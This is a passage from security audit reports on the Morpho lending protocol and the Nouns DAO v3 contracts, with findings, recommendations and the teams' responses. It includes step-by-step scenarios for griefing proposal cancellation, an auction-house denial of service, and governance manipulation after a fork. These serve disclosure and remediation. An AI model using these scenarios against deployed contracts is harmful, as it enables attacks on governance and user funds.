information can be found in the discussion topic "Differences in actions checks between Morpho and Aave". Recommendation: Consider implementing the missing logic/sanity checks or documenting why those checks should not be added to Morpho's implementation. Morpho: Here are the motivations behind not implementing the flags 1. No amount of checks will be sufficient, and the Morpho Operator should be proactive about pausing before the underlying pool does. 2. Hardcoding can actually reduce flexibility in Morpho's pausing discretion since one action on Morpho can actually constitute multiple types of interactions with the pool. 3. Some checks are gas intensive as information from the pool needs to be fetched. Spearbit: Acknowledged. +5.5.6 Differences between Morpho and Aave supply validation logic Severity: Informational Context: aave-v2/EntryPositionsManager.sol#L90-L182 Description: The Morpho approach is to mimic 1:1 the logic of the underlying protocol, including all the logic and sanity checks that are done before executing a user's action. On top of the protocol's logic, Morpho has its own logic. By reviewing both logic, we have noticed that there are some differences between the logics Note: Morpho re-implement the supply function as a mix of repay + supply operations on Aave where needed • Both Aave and Morpho are not handling ERC20 token with fees on transfer • Morpho is not checking that the Aave market has isFrozen == false, users could be able to supply in P2P even if the supply is paused on Aave (isFrozen == true) because Morpho would only call the aave.repay (where the frozen flag is not checked) • Morpho is not checking if remainingToSupply.rayDiv( poolIndexes[_poolToken].poolSupplyIndex ) === 0. Trying to supply that amount to Aave would make the whole tx revert 19 More information about detailed information can be found in the discussion topic "Differences in actions checks between Morpho and Aave". Recommendation: Consider implementing the missing logic/sanity checks or documenting why those checks should not be added to Morpho's implementation. Morpho: Here are the motivations behind not implementing the flags: 1. No amount of checks will be sufficient, and the Morpho Operator should be proactive about pausing before the underlying pool does. 2. Hardcoding can actually reduce flexibility in Morpho's pausing discretion since one action on Morpho can actually constitute multiple types of interactions with the pool. 3. Some checks are gas intensive as information from the pool needs to be fetched. Spearbit: Acknowledged. +5.5.7 Morpho should avoid creating a new market when the underlying Aave market is frozen Severity: Informational Context: aave-v2/MorphoGovernance.sol#L473 Description: In the current implementation of Aave MorphoGovernance.createMarket the function is only check- ing if the AToken is in active state. Morpho should also check if the AToken is not in a frozen state. When a market is frozen, many operations on the Aave side will be prevented (reverting the transaction). Recommendation: Consider adding a check on the getFrozen() flag when creating a new market Morpho: The recommendation will only be added to the off-chain checklist followed before creating a new market PR 6. Spearbit: Acknowledged. +5.5.8 Differences between Morpho and Compound liquidate validation logic Severity: Informational Context: PositionsManager.sol#L487-L511 Description: The Morpho approach is to mimic 1:1 the logic of the underlying protocol, including all the logic and sanity checks that are done before executing a user's action. On top of the protocol's logic, Morpho has its own logic. Note: Morpho liquidation does not directly call compound.liquidate but acts as a repay + withdraw operation. By reviewing both logic, we have noticed that there are some differences between the logic • Morpho does not check Compound seizeGuardianPaused because it is not implementing a "real" liquidate on compound, but it's emulating it as a "repay" + "withdraw". – Morpho should anyway monitor off-chain when the value of seizeGuardianPaused changes to true. Which are the scenarios for which Compound decides to block liquidations (across all cTokens)? When this happens, is Compound also pausing all the other operations? – [Open question] Should Morpho pause liquidations when the seizeGuardianPaused is true? • Morpho is not reverting if msg.sender === borrower • Morpho does not check if _amount > 0 • Compound revert if amountToSeize > userCollateralBalance, Morpho does not revert and instead uses min(amountToSeize, userCollateralBalance) 20 More information about detailed information can be found in the discussion topic "Differences in actions checks between Morpho and Aave". Recommendation: Consider implementing the missing logic/sanity checks or documenting why those checks should not be added to Morpho's implementation. Morpho: Here are the motivations behind not implementing the flags: 1. No amount of checks will be sufficient, and the Morpho Operator should be proactive about pausing before the underlying pool does. 2. Hardcoding can actually reduce flexibility in Morpho's pausing discretion since one action on Morpho can actually constitute multiple types of interactions with the pool. 3. Some checks are gas intensive as information from the pool needs to be fetched. Spearbit: Acknowledged. +5.5.9 repayLogic in Compound PositionsManagershould revert if toRepay is equal to zero Severity: Informational Context: PositionsManager.sol#L471 Description: The current implementation of repayLogic is correctly reverting if _amount == 0 but is not reverting if toRepay == 0. The value inside toRepay is given by the min value between _getUserBorrowBalanceInOf(_- poolToken, _onBehalf) and _amount. If the _onBehalf user has zero debt, toRepay will be initialized with zero. Recommendation: Consider reverting if toRepay == 0 Morpho: Acknowledged. Spearbit: Acknowledged. +5.5.10 Differences between Morpho and Compound supply validation logic Severity: Informational Context: compound/PositionsManager.sol#L240-L243 Description: The Morpho approach is to mimic 1:1 the logic of the underlying protocol, including all the logic and sanity checks that are done before executing a user's action. On top of the protocol's logic, Morpho has its own logic. By reviewing both logic, we have noticed that there are some differences between them; • Compound is handling ERC20 tokens that could have transfer fees, Morpho is not doing it right now, see"ERC20 with transfer's fee are not handled by PositionManager". • Morpho is not checking if the underlying Compound market has been paused for the supply action (see mintGuardianPaused[token]). This means that even if the Compound supply is paused, Morpho could allow users to supply in the P2P. • Morpho is not checking if the market on both Morpho and Compound has been deprecated. If the deprecation flag is intended to be true for a market that will be removed in the next future, probably Morpho should not allow users to provide collateral for such a market. More information about detailed information can be found in the discussion topic "Differences in actions checks between Morpho and Compound". Recommendation: Consider implementing the missing logic/sanity checks or documenting why those checks should not be added to Morpho's implementation. Morpho: Here are the motivations behind not implementing the flags 21 1. No amount of checks will be sufficient, and the Morpho Operator should be proactive about pausing before the underlying pool does. 2. Hardcoding can actually reduce flexibility in Morpho's pausing discretion since one action on Morpho can actually constitute multiple types of interactions with the pool. 3. Some checks are gas intensive as information from the pool needs to be fetched. Spearbit: Acknowledged. +5.5.11 Consider creating a documentation that covers all the Morpho own flags, lending protocol's flags and how they interact/override each other Severity: Informational Context: General Description: Both Morpho and Aave/Compound have their own flags to check before allowing a user to interact with the protocols. Usually, Morpho has decided to follow the logic to map 1:1 the implementation of the underlying protocol validation. There are some examples also where Morpho has decided to override some of their own internal flags For example, in the Aave aave-v2/ExitPositionsManager.liquidateLogic even if a Morpho market has been flagged as "deprecated" (user can be liquidated without being insolvent) the liquidator would not be able to liquidate the user if the liquidation logic has been paused. Recommendation: Morpho should create in-depth documentation that explains all these flags and how they interact with each other and which was the scenario for which Morpho has decided not to follow the protocol's behavior (if this scenario exists). The documentation will be very useful to track where and when those flags interact with each other and what could be the possible outcome of a change decision. Morpho: Done internally. Spearbit: Fixed. +5.5.12 Missing natspec or typos in natspec Severity: Informational Context: General Description: - Updated the natspec updateP2PIndexes replacing "exchangeRatesStored()" with "exchangeRate- Stored()" • Updated the natspec _updateP2PIndexes replacing "exchangeRatesStored()" with "exchangeRateStored()" • Updated the natspec for event MarketCreated replacing "_poolToken" with "_p2pIndexCursor" Recommendation: Implement the recommended natspec fixes suggested in the description. Morpho: The recommendations have been implemented in the PR 1553 Spearbit: Fixed. 22 +5.5.13 Removed unused "named" return parameters from functions Severity: Informational Context: - MorphoUtils.sol#L42-L48 • MorphoUtils.sol#L50-L54 Description: Some functions in the codebase are defining "named" functions parameter that are not used explicitly inside the code. This could lead to future changes to return wrong values if the "explicit return" statement is removed and the function returns the "default" values (based on the variable type) of the "named" parameter. Recommendation: Remove the "named" parameter and only use the explicit return statement. Morpho: The issues referenced in the "context" sessions have been fixed with PR 1548. Spearbit: Acknowledged. Those references were just an example of other cases that have been found in the overall codebase. Morpho should consider checking the whole codebase and refactoring the code, removing the "named return parameters" where possible or needed. +5.5.14 Consider merging the code of CompoundMath libraries and use only one Severity: Informational Context: - compound/InterestRatesManager.sol#L7 • compound/MorphoUtils.sol#L6 • RewardsManager.sol#L7 Description: The current codebase uses libraries/CompoundMath.sol but there's already an existing solidity library with the same name inside the package @morpho-dao/morpho-utils For better code clarity, consider merging those two libraries and only importing the one from the external pack- age. Be aware that the current implementation inside the @morpho-dao/morpho-utils CompoundMath mul and div function uses low-level yul and should be tested, while the library used right now in the code use "high level" solidity. the Recommendation: @morpho-dao/morpho-utils CompoundMath and use only the one imported from the external package. libraries/CompoundMath.sol Consider merging between code and Morpho: CompoundMath library has been removed from the codebase and replaced by morpho-utils external libraries (mix of Math and CompundMath). Note that while the previous implementation of the original implementation of CompoundMath was using plain solidity, the new one (and the replaced Math functions) are using low-level yul. See PR 1521 and PR 1615. Spearbit: Verified. +5.5.15 Consider reverting the creation of a deprecated market in Compound Severity: Informational Context: compound/MorphoGovernance.sol#L442 Description: Compound has a mechanism that allows the Governance to set a specific market as "deprecated". Once a market is deprecated, all the borrows can be liquidated without checking whether the user is solvent or not. Compound currently allows users to enter (to supply and borrow) a market. In the current version of MorphoGovernance.createMarket, Morpho governance is not checking whether a market is already deprecated on compound before entering it and creating a new Morpho-market. This would allow a Morpho user to possibly supply or borrow on a market that has been already deprecated by compound. Recommendation: Consider reverting the creation of a Morpho market if the cToken has been deprecated on Compound. 23 Morpho: It's unlikely that the governance would list a deprecated market and it does prevent the underlying pool to deprecate a market later either, we acknowledge this issue. Spearbit: Acknowledged. +5.5.16 Document HeapOrdering Severity: Informational Context: HeapOrdering.sol#L66 Description: Morpho uses a non-standard Heap implementation for their Aave P2P matching engine. The im- plementation only correctly sorts _maxSortedUsers / 2 instead of the expected _maxSortedUsers. Once the _maxSortedUsers is reached, it halves the size of the heap, cutting the last level of leaves of the heap. This is done because a naive implementation that would insert new values at _maxSortedUsers (once the heap is full) and shift them up, then decrease the size to _maxSortedUsers - 1 again, would end up concentrating all new values on the same single path from the leaf to the root node. Cutting off the last level of nodes of the heap is a heuristic to remove low-value nodes (because of the heap property) while at the same time letting new values be shifted up from different leaf locations. In the end, the goal this tries to achieve is that more high-value nodes are stored in the heap and can be used for the matching engine. Recommendation: Document your heap implementation and what it tries to achieve. The _maxSortedUsers value should be of the form 2ˆk - 1 to have a full binary tree optimizing the distribution in the last step. The current version that morpho-v1 uses as its dependency does not have as many tests as the latest version of this data structure. Consider updating to the newer, more-tested version. Consider fuzz-testing this data structure to ensure it works with random values in unpredictable insertion order. Morpho: An issue has been created for this: issue 109 but not implemented yet. Spearbit: Acknowledged. +5.5.17 Consider removing the Aave-v2 reward management logic if it is not used anymore Severity: Informational Context: • aave-v2/Morpho.sol#L148-L172 • aave-v2/Morpho.sol#L17-L26 • aave-v2/MorphoGovernance.sol • aave-v2/MatchingEngine.sol#L314-L321 • aave-v2/MatchingEngine.sol#L340-L351 Description: If the current aave-v2 reward program has ended and the Aave protocol is not re-introducing it anytime soon (if not at all) consider removing the code that currently is handling all the logic behind claiming rewards from the Aave lending pool for the supplied/borrow assets. Removing that code would make the codebase cleaner, reduce the attack surface and possibly revert in case some of the state variables are incorrectly miss configured (rewards management on Morpho is activated but Aave is not distributing rewards anymore). Recommendation: Consider removing the Aave-v2 reward management logic if it is not used anymore. Morpho: The recommendations have been implemented in PR 1545. The storage variables have been marked with a "Deprecated" comment, and the claimRewards function in the Morpho contract now has an empty body. Spearbit: Fixed. As an additional recommendation, Morpho should notify, with large advance, all the integrators that rely on these APIs about the changes that will be deployed. 24 +5.5.18 Avoid shadowing state variables Severity: Informational aave- Context: v2/EntryPositionsManager.sol#L194 aave-v2/MorphoGovernance.sol#L444 aave-v2/MorphoGovernance.sol#L482 aave-v2/EntryPositionsManager.sol#L99 aave-v2/InterestRatesManager.sol#L61 Description: Shadowing state or global variables could lead to potential bugs if the developer does not treat them carefully. To avoid any possible problem, every local variable should avoid shadowing a state or global variable name. Recommendation: Rename the local scope variable with a different name than the storage variable to avoid shadowing. Morpho: We won't change variable naming as we consider it not worth doing it right now. Thus, we acknowledge this issue. Spearbit: Acknowledged. +5.5.19 Governance setter functions do not check current state before updates Severity: Informational Context: aave-v2/MorphoGovernance.sol#L178-L413 compound/MorphoGovernance.sol Description: In MorphoGovernance.sol, many of the setter functions allow the state to be changed even if it is already set to the passed-in argument. For example, when calling setP2PDisabled, there are no checks to see if the _poolToken is already disabled, or does not allow unnecessary state changes. Recommendation: The current state should be checked on important setter functions and if the new state to change is a duplicate, then the function should revert. Morpho: We do not think it's worth adding this check as the end result is the same whether there is a revert or not, so we acknowledge this issue. Spearbit: Acknowledged. +5.5.20 Emit event for amount of dust used to cover withdrawals Severity: Informational Context: aave-v2/PositionsManagerUtils.sol#L62 Description: Consider emitting an event that includes the amount of dust that was covered by the contract balance. A couple of ways this could be used: • Trigger an alert whenever it exceeds a certain threshold so you can inspect it, and pause if a bug is found or a threshold is exceeded. • Use this value as part of your overall balance accounting to verify everything adds up. Recommendation: Emit an event when a withdrawal is done. Morpho: The amount is assumed to be very small and because of this, we considered it is not worth adding an event for this purpose. Spearbit: Acknowledged. 25 +5.5.21 Break up long functions into smaller composable functions Severity: Informational Context: v2/ExitPositionsManager.sol#L491 aave-v2/EntryPositionsManager.sol#L90 aave-v2/EntryPositionsManager.sol#L188 aave-v2/ExitPositionsManager.sol#L204 aave-v2/ExitPositionsManager.sol#L336 aave- Description: A few functions are 100+ lines of code which makes it more challenging to initially grasp what the function is doing. You should consider breaking these up into smaller functions which would make it easier to grasp the logic of the function, while also enabling you to easily unit test the smaller functions. Recommendation: Refactor these long functions to instead be comprised of smaller functions. correctly, the entire existing test suite should pass. Add new tests for the new functions. If all is done Morpho: Because this requires large changes to the codebase we prefer to acknowledge this recommendation. Spearbit: Acknowledged. +5.5.22 Remove unused struct members Severity: Informational Context:aave-v2/ExitPositionsManager.sol#L140 Description: The HealthFactorVars struct contains three attributes, but only the userMarkets attribute is ever set or used. These should be removed to increase code readability. Recommendation: Verify the other two attributes i and numberOfMarketsCreated are not needed, and remove them if not needed. Morpho: Fixed in PR 1557. Spearbit: Verified. +5.5.23 Remove unused struct Severity: Informational Context: aave-v2/EntryPositionsManager.sol#L76 Description: There is an unused struct BorrowAllowedVars. This should be removed to improve code readability. Recommendation: Verify it is not needed, and remove if not needed. Morpho: Fixed in PR 1557. Spearbit: Verified. +5.5.24 No validation check on prices fetched from the oracle Severity: Informational Context: aave-v2/ExitPositionsManager.sol#L259-L260 aave-v2/MorphoUtils.sol#L272 Description: Currently in the liquidateLogic function when fetching the borrowedTokenPrice and collateral- Price from the oracle, the return value is not validated. This is due to the fact that the underlying protocol does not do this check either, but the fact that the underlying protocol does not do validation should not deter Morpho from performing validation checks on prices fetched from oracles. Also, this check is done in the Compound PositionsManager.sol here so for code consistency, it should also be done in Aave-v2. Recommendation: The borrowedTokenPrice and collateralPrice fetched from the oracle should be validated and reverted if they are zero. Morpho: We'll continue to follow the behavior of Aave and thus acknowledge this issue. 26 Spearbit: Acknowledge. +5.5.25 onBehalf argument can be set as the Morpho protocols address Severity: Informational Context: aave-v2/EntryPositionsManager.sol#L93 compound/PositionsManager.sol#L236 Description: When calling the supplyLogic function, currently the _onBehalf argument allows a user to supply funds on behalf of the Morpho protocol itself. While this does not seem exploitable, it can still be a cause for user error and should not be allowed. Recommendation: The supplyLogic function should revert if the _onBehalf argument address is the Morpho protocol itself. Morpho: We did not find any potential issue for this case, thus we acknowledge the issue. Spearbit: Acknowledged. +5.5.26 maxSortedUsers has no upper bounds validation and is not the same in Compound/Aave-2 Severity: Informational Context: compound/MorphoGovernance.sol#L170 aave-v2/MorphoGovernance.sol Description: In MorphoGovernance.sol, the maxSortedUsers function has no upper bounds limit put in place. The maxSortedUsers is the number of users to sort in the data structure. Also, while this function has the MaxSorte- dUsersCannotBeZero() check in Aave-v2, the Compound version is missing this same error check. Recommendation: Consider setting an upper bounds limit on the maxSortedUsers number so as not to run into gas issues when sorting user data in the data structure. Also, the MaxSortedUsersCannotBeZero() check should be added in the Compound version of this function as well for code consistency. Morpho: We acknowledge the issue but will not implement the recommendation. Spearbit: Acknowledged. +5.5.27 Consider adding the compound revert error code inside Morpho custom error to better track the revert reason Severity: Informational Context: MorphoGovernance.sol#L443 PositionsManager.sol#L927 PositionsManager.sol#L937 PositionsMan- ager.sol#L945 PositionsManager.sol#L970 Description: On Compound, when an error condition occurs, usually (except in extreme cases) the transaction is not reverted, and instead an error code (code !== 0) is returned. Morpho correctly reverts with a custom error when this happens, but is not reporting the error code returned by Compound. By tracking, as an event parameter, the error code, Morpho could better monitor when and why interactions with Compound are failing. Recommendation: Consider adding the Compound returned error to Morpho's custom error. Morpho: Fixed in PR 1550. Spearbit: Fixed. 27 +5.5.28 liquidationThreshold variable name can be misleading Severity: Informational Context: aave-v2/ExitPositionsManager.sol#L678 Description: The liquidationThreshold name in Aave is a percentage. The values.liquidationThreshold variable used in Morpho's _getUserHealthFactor is in "value units" like debt: values.liquidationThreshold = assetCollateralValue.percentMul(assetData.liquidationThreshold);. Recommendation: Consider renaming the variable to avoid confusion. For example, liquidationThreshold- Value. Morpho: Fixed in PR 1547 and PR 1559. Spearbit: Verified. +5.5.29 Users can be liquidated on Morpho at any time when the deprecation flag is set by governance Severity: Informational Context: v2/ExitPositionsManager.sol#L706 aave-v2/MorphoGovernance.sol#L395, compound/MorphoGovernance.sol#L372, aave- Description: Governance can set a deprecation flag on Compound and Aave markets, and users on this mar- ket can be liquidated by anyone even if they're sufficiently over-collateralized. Note that this deprecation flag is independent of Compound's own deprecation flags and can be applied to any market. Recommendation: Users should be aware of this. Clearly communicate when you deprecate a market and give enough time for users to unwind their positions on the markets to be deprecated. Morpho: No changes have been made in the code but users will be warn in any case since it requires governance approval to do so. Spearbit: Acknowledged. +5.5.30 Refactor _computeP2PIndexes to use InterestRateModel's functions Severity: Informational Context: aave-v2/InterestRatesModel.sol#L49 aave-v2/InterestRatesManager.sol#L113, compound/InterestRatesManager.sol#L100, Description: The InterestRatesManager contracts' _computeP2PIndexes functions currently reimplement the interest rate model from the InterestRatesModel functions. Recommendation: Consider refactoring the InterestRatesManager._computeP2PIndexes to use Intere- stRatesModel functions like computeGrowthFactors, computeP2PSupplyIndex, and computeP2PBorrowIndex. This would also guarantee that the lens contracts indeed use the same model that the contract uses as they use the mentioned InterestRatesModel functions. Morpho: Fixed in PR 1537. Spearbit: Verified. 28 diff --git a/findings_newupdate/spearbit/Nouns-Spearbit-Security-Review.txt b/findings_newupdate/spearbit/Nouns-Spearbit-Security-Review.txt new file mode 100644 index 0000000..6045472 --- /dev/null +++ b/findings_newupdate/spearbit/Nouns-Spearbit-Security-Review.txt @@ -0,0 +1,67 @@ +5.1.1 Any signer can cancel a pending/active proposal to grief the proposal process Severity: High Risk Context: NounsDAOV3Proposals.sol#L560-L589, NounsDAOV3Proposals.sol#L813-L821 Description: Any proposal signer, besides the proposer, can cancel the proposal later irrespective of the number of votes they contributed earlier towards the threshold. The signer could even have zero votes because getPrior- Votes(signer,..) is not checked for a non-zero value in verifySignersCanBackThisProposalAndCountTheir- Votes() as part of the proposeBySigs() flow. This seems to be a limitation of the design described in hackmd.io/@el4d/nouns-dao-v3-spec#Cancel. With the signature-based scheme, every signer is as powerful as the proposer. As long as their combined votes meets threshold, it does not matter who contributed how much to the voting power. And assuming everyone contributed some non-zero power, they are all given the cancellation capability. However, for example, a signer/proposer with 0 voting power is treated on par with any other signer who contributed 10 Nouns towards meeting the proposal threshold. A malicious signer can sign-off on every valid proposal to later cancel it. The vulnerability arises from a lack of voting power check on signer and the cancel capability given to any signer. Example scenario: Evil, without having to own a single Noun, creates a valid signature to back every signature- based proposal from a different account (to bypass checkNoActiveProp()) and gets it included in the proposal creation process via proposeBySigs(). Evil then cancels every such proposal at will, i.e. no signature-based proposal that Evil manages to get included into, potentially all of them, will ever get executed. Impact: This allows a malicious griefing signer who could really be anyone without having to own any Nouns but manages to get their signature included in the proposeBySigs() to cancel that proposal later. This effectively gives anyone a veto power on all signature-based proposals. High likelihood + Medium impact = High severity. • Likelihood is High because anyone with no special ownership (of Nouns) or special roles in the protocol frontend could initiate a signature to be accepted by the proposer. We assume no other checks by e.g. because those are out-of-scope, not specified/documented, depend on the implementation, depend on their trust/threat models or may be bypassed with protocol actors interacting directly with the contracts. We cannot be sure of how the proposer decides on which signatures to include and what checks are actually made, be- cause that is done offchain. Without that information, we are assuming that proposer includes all signatures they receive. • Impact is Medium because, with the Likelihood rationale, anyone can get their signature included to later cancel a signature-backed proposal, which in the worst case (again without additional checks/logic) gives anyone a veto power on all signature-based proposals to potentially bring governance to a standstill if sig- natures are expected to be the dominant approach forward. Even if we assume that a proposer learns to exclude a zero-vote cancelling signer (with external checks) after experiencing this griefing, the signer can move on to other unsuspecting proposers. Given that this is one of the key features of V3 UX, we reason that this permissionless griefing DoS on governance to be at Medium impact. While the cancellation capability is indeed specified as the intended design, we reason that this is a risky feature for the reasons explained above. This should ideally be determined based only on the contributing voting power as suggested in our recommendation. Filtering out signers with zero voting power raises the bar from the current situation in requiring signers to have non-zero voting power (i.e. cost of griefing attack becomes non-zero) but will not prevent signers from transferring their voting power granting Noun(s) to other addresses, get new valid signatures included on other signature-based proposals and grief them later by cancelling. Equating a non-zero voting power to a veto power on all signature-based proposals in the protocol continues to be very risky. Recommendation: Consider the following mitigative redesign (as a suggestive example i.e. there could be others) to allow cancellations only based on cumulative voting power: 5 1. Remove special consideration for proposer in the signature-based flow in verifySignersCanBackThisPro- posalAndCountTheirVotes() and other related logic to instead make them include their signature along with other signers. 2. Remove the logic of msgSenderIsProposer in cancel() to allow cancellations only if the cumulative votes of signers is less than proposal.proposalThreshold. 3. Add cancelledSigs like logic in cumulative voting power calculation of cancel() to have signers rely on it to remove their support even beyond the proposal creation state. 4. Allow anyone to permissionlessly (i.e. doesn't have to be proposer or signer) call cancel() which calculates the cumulative voting power calculation of the proposal while accounting for cancelledSigs like logic from all signers (even the proposer who is also a signatory like other signers) and cancels the proposal transactions if the cumulative voting power is below proposalThreshold. The scale of the modifications proposed isn't too substantial, the base recommendation can be written as (skipping the (1) step above to limit the changes and to remain in line with V1 and V2 logic): • NounsDAOV3Proposals.sol#L560-L587 function cancel(NounsDAOStorageV3.StorageV3 storage ds, uint256 proposalId) external { ... NounsDAOStorageV3.Proposal storage proposal = ds._proposals[proposalId]; address proposer = proposal.proposer; NounsTokenLike nouns = ds.nouns; - - - + uint256 votes = nouns.getPriorVotes(proposer, block.number - 1); bool msgSenderIsProposer = proposer == msg.sender; address[] memory signers = proposal.signers; for (uint256 i = 0; i < signers.length; ++i) { msgSenderIsProposer = msgSenderIsProposer || msg.sender == signers[i]; votes += nouns.getPriorVotes(signers[i], block.number - 1); if (!ds.cancelledSigProposals[signers[i]][proposalId]) votes += ,! nouns.getPriorVotes(signers[i], block.number - 1); } require( msgSenderIsProposer || votes <= proposal.proposalThreshold, proposer == msg.sender || votes <= proposal.proposalThreshold, 'NounsDAO::cancel: proposer above threshold' ); • NounsDAOInterfaces.sol#L684-L685) /// @notice user => sig => isCancelled: signatures that have been cancelled by the signer and are no longer valid ,! mapping(address => mapping(bytes32 => bool)) cancelledSigs; /// @notice user => proposalId => isCancelled: proposals for which signers has cancelled their signatures mapping(address => mapping(uint256 => bool)) cancelledSigProposals; • NounsDAOV3Proposals.sol#L262-L267 - + + + ,! + 6 - + ,! function cancelSig(NounsDAOStorageV3.StorageV3 storage ds, bytes calldata sig) external { function cancelSig(NounsDAOStorageV3.StorageV3 storage ds, bytes calldata sig, uint256 proposalId) external { bytes32 sigHash = keccak256(sig); ds.cancelledSigs[msg.sender][sigHash] = true; if (proposalId > 0) { ds.cancelledSigProposals[msg.sender][proposalId] = true; } emit SignatureCancelled(msg.sender, sig); + + + } Nouns: Signers being able to cancel a proposer they signed is a conscious design choice. We plan to filter out signers that have voting power of zero in proposeBySigs. We implemented a fix here: PR 713 but still think the severity should be lowered. Likelihood: low Only the proposer of a proposal can call proposerBySigs, therefore, a malicious signer can't include the signature by front-running for example. In addition, the frontend will filter out signers that have no voting power as well as notify the user that any signer included will have the power to cancel the proposal. Therefore, we think the likelihood a user would add a signer with no voting power is low Impact: low Even if for some reason, perhaps confusion, a user adds a signer with zero votes and their proposal gets cancelled, they can propose again and are unlikely to make the same mistake again. For the reasons we shared earlier: won’t fix Spearbit: The proposed fix PR 713 checks for signer votes and skips inclusion/consideration if its votes is zero. It also reverts if the number of non-zero signers is zero. The fix for the described surface and our recommendation would be to remove the ability of a signer to cancel unconditionally. Simultaneously, in order to keep the relevant degree of renouncing power in the hands of signers cancelledSigs like mechanics can be added to the cancel() logic. Currently cancelSig() has no implications on cancel() which doesn't look like a consistent behavior as whenever a signer runs cancelSig() they could not expect that it's not enough and there is also cancel() that needs to be run because otherwise the signature is de facto continued to be used as fully valid. At the same time, the ability of any signer to cancel unconditionally appears to be excessive. Why is the cancellation justified when there are enough votes to pass the proposal threshold even without this signature? We see a griefing surface here and not too much value added. Therefore, we are not convinced that the proposed fix mitigates the described risk completely. +5.1.2 Potential Denial of Service (DoS) attack on NounsAuctionHouseFork Contract Severity: High Risk Context: NounsAuctionHouseFork.sol#L213 Description: The potential vulnerability arises during the initialization of the NounsAuctionHouseFork contract, which is deployed and initialized via the executeFork() function when a new fork is created. At this stage, the state variable startNounId within the NounsTokenFork contract is set corresponding to the nounId currently being auctioned in the NounsAuctionHouse. It should be noted that the NounsAuctionHouseFork contract is initially in a paused state and requires a successful proposal to unpause it, thus enabling the minting of new nouns tokens within the fork. Based on the current structure, an attacker can execute a DoS attack through the following steps: 7 1. Assume the executeFork() threshold is 7 nouns and the attacker owns 8 nouns. The current nounId being auctioned is 735. 2. The attacker places the highest bid for nounId 735 in the NounsAuctionHouse contract and waits for the auction's conclusion. 3. Once the auction concludes, the attacker calls escrowToFork() with his 8 nouns, triggering the execute- Fork() threshold. 4. Upon invoking executeFork(), new fork contracts are deployed. Below is the state of both NounsAuction- HouseFork and NounsAuctionHouse contracts at this juncture: NounsAuctionHouseFork state: nounId -> 0 amount -> 0 startTime -> 0 endTime -> 0 bidder -> 0x0000000000000000000000000000000000000000 settled -> false NounsAuctionHouse state: nounId -> 735 amount -> 50000000000000000000 startTime -> 1686014675 endTime -> 1686101075 bidder -> 0xE6b3367318C5e11a6eED3Cd0D850eC06A02E9b90 (attacker's address) settled -> false 5. The attacker executes settleCurrentAndCreateNewAuction() on the NounsAuctionHouse contract, thereby acquiring the nounId 735. 6. Following this, the attacker invokes joinFork() on the main DAO and joins the fork with nounId 735. This action effectively mints nounId 735 within the fork and subsequently triggers a DoS state in the NounsAuc- tionHouseFork contract. 7. At a later time, a proposal is successfully passed and the unpause() function is called on the NounsAuction- HouseFork contract. 8. A revert occurs when the _createAuction() function tries to mint tokenId 735 in the fork (which was already minted during the joinFork() call), thus re-pausing the contract. More broadly, this could happen if the buyer of the fork DAO's startNounId (and successive ones) on the original DAO (i.e. the first Nouns that get auctioned after a fork is executed) joins the fork with those tokens, even without any malicious intent, before the fork's auction is unpaused by its governance. Applying of delayed governance on fork DAO makes this timing-based behavior more feasible. One has to buy one or more of the original DAO tokens auctioned after the fork was executed and use them to join the fork immediately. The NounsAuctionHouseFork contract gets into a DoS state, necessitating a contract update in the NounsToken- Fork contract to manually increase the _currentNounId state variable to restore the normal flow in the NounsAuc- tionHouseFork. High likelihood + Medium impact = High Severity. Likelihood: High, because its a very likely scenario to happen, even unintentionally, the scenario can be triggered by a non-malicious user that just wants to join the fork with a fresh bought Noun from the auction house. Impact: Medium, because forking is bricked for at least several weeks until the upgrade proposal passes and is in place. This is not simply having a contract disabled for a period of time, this can be considered as a loss of assets for the Forked DAO as well, i.e. imagine that the Forked DAO needs funding immediately. On top of this, the contract upgrade would have to be done on the NounsTokenFork contract to correct the _currentNounId state variable to a valid value and fix the Denial of Service in the NounsAuctionHouseFork. Would the fork joiners be willing to perform such a risky update in such a critical contract? Recommendation: Consider one of the below options: 8 1. Update NounsTokenFork._currentNounId in claimDuringForkPeriod() if tokenIds[i] >= _current- NounId so that fork auctions begin on Nouns that have not been auctioned (and migrated+minted on this fork) on the original DAO yet. 2. Store the initial nounId that is being auctioned when the executeFork() function is invoked, and then prevent any subsequent calls to the joinFork() function with a nounId that is equal to or higher than that value. This will ensure that the _createAuction() function does not attempt to mint an already minted tokenId, thus preventing the contract from getting into a DoS state. However, note that with MAX_FORK_PERIOD being 14 days which means, depending on the duration of delayed governance and status of unclaimed escrow tokens, this could prevent up to 14 auctioned Nouns in the worst case from joining the fork. Nouns: Mitigation PR here: PR 714. Spearbit: Verified that PR: PR 714 fixes the issue using the first recommendation. 5.2 Medium Risk +5.2.1 Total supply can be low down to zero after the fork, allowing for execution of exploiting proposals from any next joiners Severity: Medium Risk Context: NounsDAOLogicV1Fork.sol#L242-L305 Description: Total supply can be low down to reaching zero during forking period, so any holder then entering forked DAO with joinFork() can push manipulating proposals and force all the later joiners either to rage quit or to be exploited. As an example, if there is a group of nouns holders that performed fork for pure financial reasons, all claimed forked nouns and quitted. Right after that it is block.timestamp < forkingPeriodEndTimestamp, so isForkPe- riodActive(ds) == true in original DAO contract. In the same time forked token's adjustedTotalSupply is zero (all new tokens were sent to timelock): • NounsDAOLogicV1Fork.sol#L201-L208 function quit(uint256[] calldata tokenIds) external nonReentrant { ... for (uint256 i = 0; i < tokenIds.length; i++) { >> nouns.transferFrom(msg.sender, address(timelock), tokenIds[i]); } • NounsDAOLogicV1Fork.sol#L742-L744 function adjustedTotalSupply() public view returns (uint256) { return nouns.totalSupply() - nouns.balanceOf(address(timelock)); } Also, NounsTokenFork.remainingTokensToClaim() == 0, so checkGovernanceActive() check does not revert in the forked DAO contract: • NounsDAOLogicV1Fork.sol#L346-L349) function checkGovernanceActive() internal view { if (block.timestamp < delayedGovernanceExpirationTimestamp && nouns.remainingTokensToClaim() > ,! 0) revert WaitingForTokensToClaimOrExpiration(); } Original DAO holders can enter new DAO with joinFork() only, that will keep checkGovernanceActive() non- reverting in the forked DAO contract: 9 • NounsDAOV3Fork.sol#L139-L158 function joinFork( NounsDAOStorageV3.StorageV3 storage ds, uint256[] calldata tokenIds, uint256[] calldata proposalIds, string calldata reason ) external { ... for (uint256 i = 0; i < tokenIds.length; i++) { ds.nouns.transferFrom(msg.sender, timelock, tokenIds[i]); } >> NounsTokenFork(ds.forkDAOToken).claimDuringForkPeriod(msg.sender, tokenIds); emit JoinFork(forkEscrow.forkId() - 1, msg.sender, tokenIds, proposalIds, reason); } As remainingTokensToClaim stays zero as claimDuringForkPeriod() doesn't affect it: • NounsTokenFork.sol#L166-L174 function 